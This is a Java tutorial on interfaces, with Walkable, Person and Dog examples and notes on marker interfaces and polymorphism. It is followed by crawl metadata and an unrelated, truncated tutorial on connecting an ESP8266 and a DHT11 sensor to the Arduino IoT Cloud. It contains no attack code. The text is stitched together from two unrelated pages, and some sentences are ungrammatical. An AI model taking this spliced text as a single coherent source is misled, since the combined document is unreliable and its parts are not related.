Both person and dog can walk. The walk here is a abstract concept. The dog can walk and so does the person. Here we can create an interface called Walkable to represent the walk concept. Then we can have the Person class and Dog class to implement the Walkable concept and provide their own implementation. The Person class implements the Walkable interface and makes the person to walk in a human being way. And the Dog class can implement the Walkable interface and makes the dog to walk in a dog way.
In the following we will use an example to show why do we need
interface.
Suppose
Person class has a walk() method.
public interface Walkable { void walk();//from w w w. j a v a 2s . c om } class Person implements Walkable { public Person() { } public void walk() { System.out.println("a person is walking."); } } class Dog implements Walkable { public Dog() { } public void walk() { System.out.println("a dog is walking."); } }
A class can implement one or more interfaces using the keyword implements in its declaration.
By implementing an interface, a class guarantees that it will provide an implementation for all methods declared in the interface or the class will declare itself abstract.
If a class implements the Walkable interface, it must provide implementation for the walk() method.
Like a class, an interface defines a new reference type.
When defining a new interface (e.g. Walkable), we define a new reference interface type.
The following declaration is valid:
Walkable w; // w is a reference variable of type Walkable
You cannot create an object of an interface type since the interface is to define an abstract concept. The following code is invalid:
new Walkable(); // A compile-time error
We can create an object only for a class type, but we can use an interface type variable can refer to any object whose class implements that interface.
Because the Person and Dog classes implement the Walkable interface, a reference variable of the Walkable type can refer to an object of these classes.
Walkable w1 = new Person(); // OK Walkable w2 = new Dog(); // OK
We can access any members of the interface using its reference type variable. Since Walkable interface has only one member, which is the walk() method, we can write code as shown:
// Let the person walk w1.walk(); // Let the dog walk w2.walk();
When invoking the walk() method on w1, it invokes the walk() method of the Person object because w1 is referring to a Person object.
When invoking the walk() method on w2, it invokes the walk() method of the Dog object because w2 is referring to a Dog object.
When calling a method using a reference variable of an interface type, it calls the method on the object to which it is referring.
The following code created a method to use interface we parameter type.
public class Main{ public static void main(String[] args) { Walkable[] w = new Walkable[2]; w[0] = new Person(); w[1] = new Dog(); Walkables.letThemWalk(w); } } class Walkables { public static void letThemWalk(Walkable[] list) { for (Walkable w : list) { w.walk(); } } }
The general syntax for declaring an interface is
<modifiers> interface <interface-name> { Constant-Declaration Method-Declaration Nested-Type-Declaration }
An interface declaration starts with list of modifiers, which may be empty.
Like a class, an interface can have a public or package-level scope.
The keyword public is used to indicate that the interface has a public scope.
Absence of a scope-modifier indicates that the interface has a package-level scope. An interface with a package-level scope can be referred to only within the members of its package.
The keyword
interface is used to declare an interface and
is followed by the name of the interface.
The name of an interface must be a valid Java identifier.
An interface body follows its name and is placed inside braces.
The body of an interface can be empty. The following is the simplest interface declaration:
package com.java2s; interface Updatable { // The interface body is empty }
Like a class, an interface has a simple name and a fully qualified name. The identifier that follows the keyword interface is its simple name.
The fully qualified name of an interface is formed by using its package name and the simple name separated by a dot.
In the above example, Updatable is the simple name and com.java2s.Updatable is the fully qualified name.
The rules of using simple and fully qualified name of an interface are the same as that of a class.
The following code declares an interface named ReadOnly. It has a public scope.
package com.java2s; public interface ReadOnly { // The interface body is empty }
An interface declaration is always abstract whether you declare it abstract explicitly or not.
Marker Interfaces are interfaces with no members.
A marker interface marks the class with a special meaning.
interface Shape { } class Circle implements Shape{ } Shape c = new Circle(); if (c instanceof Shape) { System.out.println("Using a Shape object"); }
Java API has many marker interfaces. The java.lang.Cloneable, java.io.Serializable, and java.rmi.Remote are all the marker interfaces.
An interface with just one abstract method is known as a functional interface.
Polymorphism refers to the ability of an object to take on many forms.
polymorphism is an ability of an object to provide its different views.
Interfaces let us create a polymorphic object.
|
http://www.java2s.com/Tutorials/Java/Java_Object_Oriented_Design/0500__Java_interface.htm
|
CC-MAIN-2017-22
|
refinedweb
| 984
| 57.37
|
Sequence Containers in C++
In this tutorial, we will learn about sequence containers in C++. What is the sequence containers and why we use it in?
What is Sequence Containers in C++
A sequence is a container that stores a finite set of objects of the same type in a linear organization. An array of names is a sequence. You would use one of the three sequence types–std::vector, std ::list, or std::deque –for a particular application depending on its retrieval requirements.
The std :: vector Class in sequence containers
An std :: vector is a sequence you can access at random. You can append entries to and remove entries from the end of the std ::vector without the undue overhead. Insertion and deletion at the beginning or in the middle of the std :: vector takes more time because they involve shifting the remaining entries to make room or to close up the deleted object space. An std :: vector is an array of contiguous objects with an instance counter or pointer to indicate the end of the container. Random access is a matter of using a subscript operation.
The std :: list Class
A std:: list is a sequence you can access bidirectionally. A std:: list enables you to perform inserts and deletion anywhere without undue performance penalties. Random access is simulated by forward or backward iteration to the target object. An std:: list consists of non-contiguous objects linked together with forward and backward pointers.
The std ::deque Class
An std:: deque is like an std:: vector except for an std:: deque allows fast inserts and deletes at the beginning, as well as the end, of the container. Random inserts and deletes take more time.
#include<iostream> #include<iomanip> #include<vector> #include<algorithm> using namespace std; int main() { int dim; std::cout<<"How many integers? "; std::cin>>dim; // --a vector of integers std::vector<int> vct; // -- insert values into the vector for( int i=0;i<dim;i++) vct.insert(vct.end(),std:: rand()); std::cout<<"\n -- unsorted --"; std::vector<int>::iterator iter; //redeclaration for(i=0, iter=vct.begin();iter<vct.end(); iter++,i++) { if((i%4)==0) std::cout<<"\n"; std::cout<<std::setw(8)<<*iter; } // --sort the array with the std sort algorithm std::sort(vct.begin(), vct.end()); std::cout<<"\n --sorted --"; for(i=0,iter =vct.begin(); iter <vct.end(); iter++,i++) { if((i%4)==0) std::cout<<"\n"; std::cout<<std::setw(8)<<*iter; } }
Output from program
how many integers? 8 -- unsorted -- 41 18467 6334 26500 19169 15724 11478 29358 -- sorted -- 41 6334 11478 15724 18467 19169 26500 29358
Also read:
|
https://www.codespeedy.com/sequence-containers-in-cpp/
|
CC-MAIN-2019-43
|
refinedweb
| 437
| 55.84
|
One of the ways of the SOA Suite 11g for communicating with the outside world – apart of course from web service calls and interaction via technology adapters – is through the new User Messaging Service (UMS), a facility installed in the SOA Domain during installation of the SOA Suite. The UMS enables two-way communication between users (real people) and deployed applications. The communication can be via various channels, including Email, Instant Messaging (IM or Chat), SMS and Voice. UMS is used from several components in Fusion Middleware, for example BPEL, Human Workflow, BAM and WebCenter and can also be used from custom developed applications.
This article describes how the User Messaging Service can be configured to use Google Mail as its mail server for sending and receiving emails and how we can make use of that facility from a simple BPEL process. Note that the steps described in this article apply to any public email server – Yahoo, Hotmail, Lycos and others – as well as your own email server. email sending capabilities.
Configure the UMS Email Driver
The User Messaging Service comes with a number of drivers that each handle traffic for a specific channel. One of the drivers controls the email channel. This driver needs to be configured with the properties of the Google GMail Server and the email account from which emails are sent.
Go to the Oracle Enterprise Manager Fusion Middleware Control Console (typically) and open the User Messaging Service node. From the drop down menu in the right hand pane, select the option Email Driver Properties:
The form that is now shown allows you to set various properties on the Email Driver, including the details about the email server to be used by the driver for email operations.
The properties that need to be configured for sending emails are indicated in the red rectangle. They are:
- OutgoingMailServer – that should be smtp.gmail.com for Gmail
- OutgoingMailServerPort – 465 for Gmail
- OutgoingMailServerSecurity – Gmail uses SSL
- OutgoingDefaultFromAddress (optional) – the emailaddress that is indicated as the sender of the email message
- OutgoingUsername – the Gmail user account from which the email is sent
- OutgoingPassword – the Gmail account’s password (stored in encrypted format)
Press Apply. To have these settings take effect, the Driver has to be restarted. This happens automatically I presume when the SOA Server is restarted, which we will do at the end of the next step. Otherwise, you can use the options Shutdown and Start in the dropdown menu option Control.
Configure the SOA Suite Workflow Notification properties
To make sure that (email) notifications are really sent to the email server, we also need to adjust a setting for the SOA Suite Workflow Notification. Navigate to the properties form via the dropdown menu for SOA Infrastructure, under SOA Administration:
The Workflow Notification Properties are shown. Only one is really important at this point: the Notification Mode (default value is None) must be set to either All or Email, otherwise any notification is not really sent onwards by the SOA Suite to UMS!
At this point, the SOA Server needs to be restarted to have the changes take effect.
Create a BPEL process that sends an email HelloWorldEmailSOAComposite – – HelloWorldEmail – an expression that concattenates the string "Hello dear " with the client:input element in the inputVariable.
5. Drag an Email activity from the Component Palette and drop it under the Assign Activity.
The configuration of the email activity must be specified. This includes the subject and body of the message (both can contain dynamic values from BPEL process instance) as well as the addressee (again, can be derived dynamically as well as defined at design time):
The content of the message body is defined as follows:
Dear Sir/Madam, We would like to inform you of the fact that our HelloWorld service has been invoked again.]')%>
6. Deploy the Composite Application to the SOA Suite.
Run the Composite Application
Open the Enterprise Manager (). Expand the node SOA node under the root node Farm_soa_domain. The node for HelloWorldEmailSOAComposite, something to the effect of ‘Hello dear Lucas’.
As part of the now completed instance of the composite application, a call is supposed to have been made to the Notification Service that in turn engaged the UMS that approached the Gmail server to send an email on behalf of the BPEL process instance. We can see trace of this message on the Message Status page for the User Messaging Service in the Enterprise Manager console.
An even better place to find the email is of course in the Inbox of the email account to which the email message was sent
(as well as in the Sent folder for the email account from which the message was sent):
Resources
This article provides an overview of protocols and ports supported by various public email services:.
Chapter 24, Configuring the User Messaging Service in the Fusion Middleware Administrator’s Guide for Oracle SOA Suite.
Hi,
    I have a requirement in Oracle BPEL 11g to send an email with multiple attachments of PDF files.Please share some thaughts which will be helpful for me.
Thanks & Regards
Irfan Shaikh
Hi,
I followed the steps as in your example, when i test the project in console it is working fine and i am getting the output, but the process is not sending the notification to the email. Can you please help me in this?
Thanks in advance.
good one
hey i have a question can we create two smpt server configuration …. in soa 11g
Hi Lucas,
I have followed as you mentioned in the post. But still i am getting following error:
<Nov 25, 2011 2:25:17 PM IST> <Info> <EJB> <vWKSTN130A.exeterblr.com> <soa_server1> <[ACTIVE] ExecuteThread: ‘4’ for queue: ‘weblogic.kernel.Default (self-tuning)’> <weblogic> <> <55ccc1286120d348:-3f0f19d0:133d9cf3172:-8000-00000000000000a7> <1322211317432> <BEA-010227> <EJB Exception occurred during invocation from home or business: oracle.bpel.services.notification.impl.asns.ASNSInteraction_rwgsr4_HomeImpl@13f0ab8 threw exception: java.lang.NullPointerException>
can you please provide the solution for the same.Â
Thanks in advance
Hi ,
I have followed the same but getting the following error
i have followed all the steps.but not able to send notification to gmail account.
getting error sdp messaging driver not configured.java.net. connection time out.
Unable to connect to smtp.gmail.com
port 465,invalid address .
can u provide solution to this problem
Hello,
In may case when I deployed the appplication I got the error message Error(126): unresolved namespace prefix namespace prefix “xpath20″ can not be resolved Define this prefix in the bpel source file so I had to add the following to BPEL file
xmlns:xpath20=”“
its helpful to make email Notification Project but when we test this project it show the response but in message status it shows nothing and not send a notification to given email addresses
hi,
i need to pass the From account name in the Email activity from the payload. i.e, the from address of the email must be set dynamically from the payload. is that possible?
Â
currently, though the From Address is sent from payload to the notification wsdl, the email is delivered with the default From account name settings..
can you please share your input to this problem?
Hi Lucas,
How do you receive an email in BPEL?
Please share your thoughts/steps to achieve it.
Thanks,
A
Can we send a mail notification in soa 11g when BPEL composite is not active/service down situation?
Hi Lucas,
Here are the steps I went through to get this working in 11.1.1.3.0 on linux:
1. Get gmail certificates (see also :Â)
openssl s_client -connect smtp.gmail.com:465 > smtp.cert
openssl s_client -connect imap.gmail.com:993 > imap.cert
2. Edit the smtp.cert & imap.cert, remove everything except the :
—–BEGIN CERTIFICATE—–
<certificate>
—–END CERTIFICATE—–
Note: you need to keep the BEGIN CERTIFICATE & END CERTIFICATE lines in the file.
3. Import the certificates into a new trust store:
keytool -import -alias imap.gmail.com -keystore trusted-certificates.jks -file imap.cert
keytool -import -alias smtp.gmail.com -keystore trusted-certificates.jks -file smtp.cert
You will be prompted to enter a password.
4. Edit setDomainEnv.sh, replace the existing javax.net.ssl.trustStore property setting with “-Djavax.net.ssl.trustStore=<path>/trusted-certificates.jks -Djavax.net.ssl.trustStorePassword=<password you used>”
5. Restart.
Hope this helps,
Tim
Is there any way to configure more than 1 mail acount  (FROM ACOUNT) to send mails?
Apparently some changes in either GMail or in FMW 11gPS1 now force us to have the GMail SSL certificates loaded in our local JVMs keystore.
Â
Instructions on how to add certificate to key store are here:Â. However, how to retrieve those certificates is not entirely clear to me yet. So I do not have it working anymore – sending notifications via GMail!
Useful article also here:.
Useful instruction on sending test notifications to verify the configuration of the email channel:Â
Hi ,
I have configured the email activity in jdeveloper 11g and deployed it on SOA 11g server. But at runtime , I am getting the following error:
==================================================
Cannot get Object part ‘Responses’. No parts are set on the message
===================================================
Can you help on this?
|
http://technology.amis.nl/2009/08/19/configure-soa-suite-11g-for-sending-email-notifications-with-google-mail/
|
CC-MAIN-2014-42
|
refinedweb
| 1,542
| 54.02
|
Deploy on the platform made for Next.js →
Deploy Next.js in seconds →
After 70 canary releases we are pleased to introduce Next.js 9, featuring:
As always, we have strived to ensure all these benefits are backwards compatible.
For most Next.js applications, all you need to do is run:
There are very few cases where your codebase might require changes. See the
upgrade guide for more information.
Since our last release, we’re happy to have seen companies like
IGN,
Bang & Olufsen,
Intercom,
Buffer,
and Ferrari launch with Next.js.
One year ago Next.js 6 introduced basic TypeScript
support through a plugin called @zeit/next-typescript.
Users also had to customize their .babelrc and enable it in next.config.js.
@zeit/next-typescript
.babelrc
next.config.js
When configured, the plugin would allow .ts and .tsx files to be built by Next.js.
However, it did not integrate type-checking, nor were types provided by Next.js core.
This meant a community package had to be maintained separately in DefinitelyTyped
that could be out of sync with releases.
.ts
.tsx
While talking with many users, existing and new, it became clear that most were very
interested in using TypeScript.
They wanted a more reliable and standard solution for easily integrating TypeScript
into their existing or new codebase.
For that reason, we set out to integrate TypeScript support into the Next.js core,
improving developer experience, and making it faster in the process.
Getting started with TypeScript in Next.js is easy: rename any file, page or
component, from .js to .tsx. Then, run next dev!
.js
next dev
This will cause Next.js to detect TypeScript is being used in
your project.
The Next.js CLI will guide you through installing the necessary types for React and
Node.js.
Next.js will also create a default tsconfig.json with sensible defaults if not
already present. This file allows for integrated type-checking in editors like
Visual Studio Code.
tsconfig.json
Next.js handles type-checking for you in both development and building for production.
While in development Next.js will show you type errors after saving a file.
Type-checking happens in the background, allowing you to interact with your updated
application in the browser instantly. Type errors will propagate to the browser as
they become available.
Next.js will also automatically fail the production build (i.e. next build) if
type errors are present. This helps prevent shipping broken code to production.
next build
Over the past few months we’ve migrated most of the codebase to TypeScript, this has
not only reinforced our code quality, it also allows us to provide types for all core
modules.
For example, when you import next/link, editors that support TypeScript will show
the allowed properties and which values they accept.
next/link
Dynamic routing (also known as URL Slugs or Pretty/Clean URLs) was one of the first
feature requests on GitHub after Next.js was released 2.5 years ago!
The issue was “solved” in Next.js 2.0 by introducing the custom server API for using
Next.js programmatically. This allowed using Next.js as a rendering engine, enabling
abstractions and mapping of incoming URLs to render certain pages.
We spoke with users and examined many of their applications, finding that many of
them had a custom server. A pattern emerged: the most prominent reason for the custom
server was dynamic routing.
However, a custom server comes with its own pitfalls: routing is handled at the
server level instead of the proxy, it is deployed and scaled as a monolith, and
it is prone to performance issues.
Since a custom server requires the entire application to be available in one
instance, it is typically difficult to deploy to a Serverless environment that
solves these issues.
Serverless requests are routed at the proxy layer and are scaled/executed
independently to avoid performance bottlenecks.
Additionally, we believe we can offer a better Developer Experience!
Much of Next.js' magic starts when you create a file named pages/blog.js and
suddenly have a page accessible at /blog.
pages/blog.js
Why should a user need to create their own server and learn about Next.js'
programmatic API to support a route like /blog/my-first-post (/blog/:id)?
/blog/my-first-post
/blog/:id
Based on this feedback and vision, we started investigating route mapping solutions,
driven by what users already knew: the pages/ directory.
pages/
Next.js supports creating routes with basic named parameters, a pattern popularized
by path-to-regexp (the library
that powers Express).
path-to-regexp
Creating a page that matches the route /post/:pid can now be achieved by creating
a file in your pages directory named: pages/post/[pid].js!
/post/:pid
pages
pages/post/[pid].js
Next.js will automatically match requests like /post/1, /post/hello-nextjs, etc
and render the page defined in pages/post/[pid].js.
The matching URL segment will be passed as a query parameter to your page with the
name specified between the [square-brackets].
/post/1
/post/hello-nextjs
[square-brackets]
For example: given the following page and the request /post/hello-nextjs, the
query object will be { pid: 'hello-nextjs' }:
query
{ pid: 'hello-nextjs' }
static async getInitialProps({ query }) {
// pid = 'hello-nextjs'
const { pid } = query
const postContent = await fetch(
`{encodeURIComponent(pid)}`
).then(r => r.text())
return { postContent }
}
Multiple dynamic URL segments are also supported!
The [param] syntax is supported for directory names and file names, meaning the following examples work:
[param]
./pages/blog/[blogId]/comments/[commentId].js
./pages/posts/[pid]/index.js
You can read more about this feature in the Next.js Documentation or Next.js Learn section.
Next.js added support for static website generation in v3, released approximately two
years ago.
At the time, this was the most requested feature to be added to Next.js.
And for good reason: there's no denying that static websites are fast! They require
no server-side computation and can be instantly streamed to the end-user from CDN
locations.
However, the choice between a server-side rendered or statically generated
application was binary, you either choose for server-side rendering or for static
generation.
There was no middle ground.
In reality applications can have different requirements.
These requirements require different rendering strategies and trade-offs.
For example, a homepage and marketing pages typically contain static content and are
great candidates for static optimization.
On the other hand, a product dashboard may benefit from being server-side rendering
where the data frequently updates.
We started exploring how we could give users the best of both worlds and be
fast by default.
How could we give users static marketing pages and dynamic server-rendered pages?
Beginning with Next.js 9, users no longer have to make the choice between fully
server-rendering or statically exporting their application.
Giving you the best of both worlds on a per-page basis.
A heuristic was introduced to automatically determine if a page can be prerendered to
static HTML.
This determination is made by whether or not the page has blocking data requirements
through using getInitialProps.
getInitialProps
This heuristic allows Next.js to emit hybrid applications that contain
both server-rendered and statically generated pages.
The built-in Next.js server (next start) and programmatic API
(app.getRequestHandler()) both support this build output transparently.
There is no configuration or special handling required.
next start
app.getRequestHandler()
Statically generated pages are still reactive: Next.js will hydrate your application
client-side to give it full interactivity.
Furthermore, Next.js will update your application after hydration if the page relies
on query parameters in the URL.
Next.js will visually inform you if a page will be statically generated during
development.
This visual artifact can be hidden by clicking it.
Statically generated pages will also be displayed in Next.js' build output:
In many cases when building React applications you end up needing some kind of
backend.
Either to retrieve data from a database or to process data provided by your users
(e.g. a contact form).
We found that many users who needed a backend built their API using a custom server.
In doing so, they ran into quite a few issues.
For example, Next.js does not compile custom server code, meaning that you couldn't
use import / export or TypeScript.
import
export
For this reason, many users ended up implementing their own custom compilation
pipeline on top of the custom server.
While this solved their goal, it is prone to many pitfalls: for example, when
configured incorrectly tree shaking would be disabled for their entire application.
This raised the question: what if we bring the developer experience Next.js provides
to building API backends?
Today we’re excited to introduce API routes, the best-in-class developer experience
from Next.js for building your backend.
To start using API routes you create a directory called api/ inside the pages/
directory.
api/
Any file in this directory will be automatically mapped to /api/<your route>, in
the same way that other page files are mapped to routes.
/api/<your route>
For example, pages/api/contact.js will be mapped to /api/contact.
pages/api/contact.js
/api/contact
Note: API Routes also support Dynamic Routes!
All the files inside the pages/api/ directory export a request handler function
instead of a React Component:
pages/api/
export default function handle(req, res) {
res.end('Hello World')
}
req
res
Generally API endpoints take in some incoming data, for example the querystring,
request body, or cookies and respond with other data.
When investigating adding API routes support to Next.js we noticed that in many cases
users didn’t use the Node.js request and response objects directly.
Instead, they used an abstraction provided by server libraries like Express.
The reason for doing this is that in many cases the incoming data is some form of
text that has to be parsed first to be useful.
So these specific server libraries help remove the burden of manually parsing the
data, most commonly through middlewares.
The most commonly used ones provide querystring, body, and cookies parsing, however
they still require some setup to get started.
API routes in Next.js will provide these middlewares by default so that you can be
productive creating API endpoints immediately:
export default function handle(req, res) {
console.log(req.body) // The request body
console.log(req.query) // The url querystring
console.log(req.cookies) // The passed cookies
res.end('Hello World')
}
Besides using incoming data your API endpoint generally also returns data.
Commonly this response will be JSON.
Next.js provides res.json() by default to make sending data easier:
res.json()
export default function handle(req, res) {
res.json({ title: 'Hello World' })
}
When making changes to API endpoints in development the code is automatically
reloaded, so there is no need to restart the server.
<Link>
Next.js 9 will automatically prefetch <Link> components as they appear in-viewport.
This feature improves the responsiveness of your application by making navigations to
new pages quicker.
Next.js uses an Intersection Observer to
prefetch the assets necessary in
the background.
These requests have low-priority and yield to fetch() or XHR requests.
Next.js will avoid automatically prefetching if the user has data-saver enabled.
fetch()
You can opt-out of this feature for rarely visited pages by setting the prefetch
property to false:
prefetch
false
<Link href="/terms" prefetch={false}>
<a>Terms of Service</a>
</Link>
Next.js 9 now renders optimized AMP by default for AMP-first and hybrid AMP pages.
While AMP pages are opt-in, Next.js will automatically optimize their output.
These optimizations can result in up to 50% faster rendering speed!
This change was made possible by
Sebastian Benz's incredible work on the
AMP Optimizer.
typeof window
Next.js 9 replaces typeof window with its appropriate value (undefined or
object) during server and client builds.
This change allows Next.js to remove dead code from your production built
application automatically.
undefined
object
Users should see their client-side bundle sizes decrease if they have
server-only code in getInitialProps or other parts of their application.
In versions before 9, the only way to know that hot code replacement was going to
happen (and that the Next.js compiler toolchain is doing work) is to look at the
developer console.
However many times one is looking at the resulting rendering instead, making it hard
to know if Next.js is still doing compilation work or not.
For example you might be making changes to styles on the page that are subtle and you
wouldn't immediately know if they were updated.
For this reason we created a RFC / "good first issue"
to discuss potential solutions for the problem of indicating that work is being done.
We received feedback from many designers and engineers on the RFC, for example what
they prefer and potential directions for the design of the indicator.
Rafael Almeida took this opportunity to
collaborate with our team and implement a brand new indicator that is now available
by default in Next.js 9.
Whenever Next.js is doing compilation work you will see a small triangle show up in
the bottom right corner of the page!
Traditionally when making changes in development Next.js would show a compiling
indicator state with loading state bars filling up and would continuously clear the
screen as you made changes.
This behavior causes some issues.
Most notably it would clear console output from both your application code, for
example when you add console.log to your components.
But also when using external tools that stitch log output together like the Vercel CLI or docker-compose.
console.log
docker-compose
Starting from Next.js 9 the log output jumps less and no longer clears the screen.
The allows for a better overall experience as your terminal window will have more
relevant information and flicker less while Next.js will integrate better with tools
that you might already be using.
Special thanks to Justin Chase for collaborating
on output clearing.
Building your application for production using next build it will now give you a
detailed view of all pages that were built.
Every page receives a few statistics automatically.
The most prominent one is bundle size.
As your application grows your JavaScript bundles will also grow, this build-time
indication will help you indicate growth of your production bundles.
In the future you will also be able to set performance budgets
for pages that will fail the production build.
Besides bundle sizes we also show how many project components and node_modules
components are being used in every page.
This gives an indication of the page complexity.
node_modules
Every page also has an indication of if it's statically optimized or server-side
rendered, as every page can behave differently.
Every page can now export a configuration object.
Initially this configuration allows you to opt-into AMP,
but in the future you will be able to configure more page specific options.
// pages/about.js
export const config = { amp: true }
export default function AboutPage(props) {
return <h3>My AMP About Page!</h3>
}
To opt into hybrid AMP rendering you can use the value 'hybrid':
'hybrid'
// pages/about.js
import { useAmp } from 'next/amp'
export const config = { amp: 'hybrid' }
export default function AboutPage(props) {
const isAmp = useAmp()
return <h3>My About Page!{isAmp ? <> Powered by AMP!</> : ''}</h3>
}
The withAmp higher order component was removed in favor of this new configuration.
withAmp
We've provided a codemod
that automatically converts usage of withAmp to the new configuration object.
You can read more about this in the upgrade guide.
We've recently made some changes to our tooling to provide a better experience while
contributing to the codebase and ensure stability as the codebase grows.
As you've read under the TypeScript section the Next.js core is now written in
TypeScript and types are automatically generated for Next.js applications to use.
Besides this being useful for applications built using Next.js, it's also useful when
working on the core codebase.
As you get type errors and autocompletion automatically.
Next.js already had quite a large integration test suite that consists of 50+ Next.js
applications with tests that run against them.
These tests ensure that when a new version is released upgrading is smooth as the
features that were available before were tested against the same test suite.
Most of our tests are integration tests because in many cases they replicate "real"
developers using Next.js in development.
For example we have tests that replicate making changes to a Next.js application to
see if hot module replacement works.
Our integration tests are mostly based on Selenium webdriver, which we combined with
chromedriver to test in headless Chrome.
However as time passed certain issues would arise in other browsers, especially older
browsers like Internet Explorer 11.
Because we used Selenium we were able to run our tests automatically on multiple
browsers.
As of right now we are running our test suite on Chrome, Firefox, Safari and
Internet Explorer 11.
The Google Chrome team has been working on improving Next.js by contributing RFCs and
pull-requests.
The goal of this collaboration is large-scale performance improvements, focused on
bundle sizes, bootup and hydration time.
For example these changes will improve the experience of small websites, but also
that of massive applications like
Hulu,
Twitch,
and Deliveroo.
The first area of focus is shipping modern JavaScript to browsers that support modern
JavaScript.
For example currently Next.js has to provide polyfills for async/await
syntax as code might be executed in browsers that do not support async/await
which would break.
async
await
To avoid breaking older browsers while still sending modern JavaScript to browsers
that support it Next.js will utilize the module/nomodule pattern.
The module/nomodule pattern provides a reliable mechanism for serving modern
JavaScript to modern browsers while still allowing older browsers to fall back to
polyfilled ES5.
The RFC for module/nomodule in Next.js can be found here.
The current bundle splitting strategy in Next.js is based around a ratio-based
heuristic for including modules in a single "commons" chunk.
Because there is very little granularity as there is only one bundle, code is either
downloaded unnecessarily (because the commons chunk could include code that's not
actually required for a particular route) or the code is duplicated across multiple
page bundles.
The RFC for improved bundle splitting can be found here.
The Chrome team is also working on many other optimizations and changes that will
improve Next.js.
RFCs for these will be shared soon.
These RFCs and pull-requests are labeled "Collaboration"
so that they can be easily found in the Next.js issue tracker.
We're excited to see the continued growth of the Next.js community.
This release had over 65 pull-request authors contributing core improvements or
examples.
Talking about examples, we now provide over 200 examples on how to integrate Next.js
with different libraries and technologies!
Including most css-in-js and data-fetching libraries.
The Next.js community has doubled since the last major release with over 8,600 members. Join us!
We are thankful to our community and all the external feedback and contributions that
helped shape this release.
|
https://nextjs.org/blog/next-9
|
CC-MAIN-2020-50
|
refinedweb
| 3,246
| 58.58
|
How To Create a Servlet (ashx) in .NET using Visual Studio C#
One reason for this may be that one could argue that Web Services are faster than HTTP. This may be so for heavy transaction applications but for run of the mill applications with light to medium workloads, transfer times are negligible.
This article is a quick little diddee to help you get started with the HTTPRequest and HTTPResponse classes in the .NET framework. As it turns out, there is also a Visual Studio Solution template to implement these two classes. If you go into Visual Studio, create a new Solution under the Web node in C#.
Select the Generic Handler template under the Web node. This will create a Handler1.ashx file and a Handler1.ashx.cs file for the code behind C# code. The template provides all the necessary code to get started quickly. Below is the code from the template. In addition I have added a snippet of code to demonstrate how to extract data from parameters, assuming that you are using the POST method.
using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Services; using System.Xml.Linq; namespace SalesforceWS { /// <summary> /// Summary description for $codebehindclassname$ /// </summary> [WebService(Namespace = "")] [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] public class Handler1 : IHttpHandler { public void ProcessRequest(HttpContext context) { context.Response.ContentType = "text/plain"; //Code snippet to get parameter value string param = context.Request.Params["paramname"]; //example on one way of using the parameter value switch (param) { case "somevalue": /*You can write back simple text just like in Java or PHP or Ruby or some other server side application that supports HTTPRequests and HTTResponses*/ context.Response.Write("write back some text"); break; case "othervalue": /* * You can also write back the result from a method or another class. * */ context.Response.Write(GetSomeDataMethodLikeJava()); break; } } public bool IsReusable { get { return false; } } public string GetSomeDataMethodLikeJava() { String somevalue; //Add code return somevalue; } } }
If you would like more information on the subject or have specific questions regarding the HTTPRequest, HTTPResponse or HTTPContext., leave me a comment and I will get back as quickly as possible. If you have suggestions to improve on the article, again leave a comment. I would love the feedback..
|
http://hubpages.com/technology/How-To-Create-a-Servlet-in-dotnet-using-csharp
|
CC-MAIN-2016-50
|
refinedweb
| 370
| 50.12
|
This version of documentation is OUTDATED! Please switch to the latest one.
No language code for this page. You can select other language.
No language code for this page,
shown in other instead.
shown in other instead.
UUSL Compute Shaders
UUSL supports compute shaders: there are special functions, semantics and parameters for compute shaders.
In UNIGINE, compute shaders have a *.comp extension.
A compute shader is a special part of the graphics pipeline. It allows to execute code on the GPU, read and write buffer data.
This article assumes you have prior knowledge of the compute shaders. Also, read the following topics on UUSL before proceeding:
Main Function#
To start and end the void Main function of the compute shader, use the following instructions:
#include <core/materials/shaders/render/common.h> MAIN_COMPUTE_BEGIN(WIDTH_GROUP,HEIGHT_GROUP) <your code here> MAIN_COMPUTE_END
You should add a new line (press Enter) after closing the instruction.
This code is equivalent to:
#include <core/materials/shaders/render/common.h> layout (local_size_x = WIDTH_GROUP, local_size_y = HEIGHT_GROUP) in; void main() { <your code here> }
#include <core/materials/shaders/render/common.h> [numthreads(WIDTH_GROUP, HEIGHT_GROUP, 1)] void main(DISPATCH_INFO dispatch_info) { <your code here> }
Semantics#
Keywords#
Last update: 2022-03-05
Help improve this article
Was this article helpful?
(or select a word/phrase and press Ctrl+Enter)
|
https://developer.unigine.com/docs/future/code/uusl/compute
|
CC-MAIN-2022-21
|
refinedweb
| 215
| 51.55
|
In this user guide, you will learn how to use the Arduino IoT cloud using an ESP8266 NodeMCU module. Through this software, we’ll show you how to create your very own IoT project through which you will be able to control the onboard LED of the ESP8266 board. Not only that, but we will also create a dashboard that will display the current temperature and humidity readings. Most importantly, you can access the dashboard from anywhere in the world.
Any appropriate sensor can be used such as DS18B20, BME680, LM35, and MPU6050 but for this project, we will use a DHT11/DHT22 sensor which is used to measure temperature and humidity. Through Arduino IoT cloud you will be able to control both the ESP8266 onboard LED and sensor readings using your mobile as well as on the web dashboard.
Previously, we controlled the ESP module’s outputs through applications such as Telegram, Google Firebase, and Blynk App.
We also built our personal ESP32 IoT application by using Google Firebase and MIT App Inventor. This displayed DHT11/DHT22 sensor readings on the Andriod application:
This time we will look into another great application Arduino IoT Cloud through which we will control the ESP8266’s output as well as connect it with a DHT11 sensor to monitor sensor readings.
We will require the following for our project:
Hardware Required:
- ESP8266 NodeMCU
- DHT11 Sensor
- Connecting Wires
- Breadboard
Software Required:
- Arduino IoT Cloud
- Arduino Create Agent
We have a similar guide in ESP32 board as well: Getting Started with Arduino IoT Cloud with ESP32: Send Sensor Readings and Control Outputs
Table of Contents
Introduction to DHT11 sensor
D simultaneously. DHT sensors are pre-calibrated. We can directly connect them with ESP32/ESP8266 to obtain sensor output reading. They are internally composed of a humidity sensing sensor and a thermistor. These two components measure humidity and temperature.
Features of DHT11
- Humidity range: from 20 to 90% RH
- Temperature range: from 0 – 50 C
- Signal transmission range: ~20 m
- Inexpensive
- Fast response and it is also durable
For more information regarding DHT11, you can have a look at the articles listed below:
- DHT11 interfacing with arduino and weather station
- MicroPython: DHT11/DHT22 Web Server with ESP32/ESP8266 (Weather Station)
- Interface DHT11/DHT22 with ESP32 and display values on Web Server
- DHT11 sensor interfacing with pic microcontroller
Connecting DHT11 sensor with the ESP8266 NodeMCU
